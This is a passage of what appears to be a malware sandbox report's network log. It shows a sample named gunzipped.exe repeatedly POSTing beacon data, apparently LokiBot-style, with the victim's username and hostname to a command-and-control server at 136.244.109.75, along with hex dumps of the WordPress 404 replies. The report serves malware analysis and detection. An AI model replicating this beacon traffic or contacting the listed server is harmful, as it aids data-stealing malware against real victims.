6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:23.493066072 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:23.493103981 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:23.493139029 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:23.493177891 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:23.493216038 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:23.493257999 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:23.493299007 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:23.493335962 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:23.493380070 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          60192.168.2.549774136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:23.842884064 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:24.052902937 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:25.006131887 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:23 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:25.006189108 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:25.006228924 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:25.006270885 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:25.006320000 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:25.006360054 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:25.006403923 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:25.006448984 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:25.006489038 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:25.006530046 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          61192.168.2.549775136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:25.351054907 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:25.563291073 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:26.477631092 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:25 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
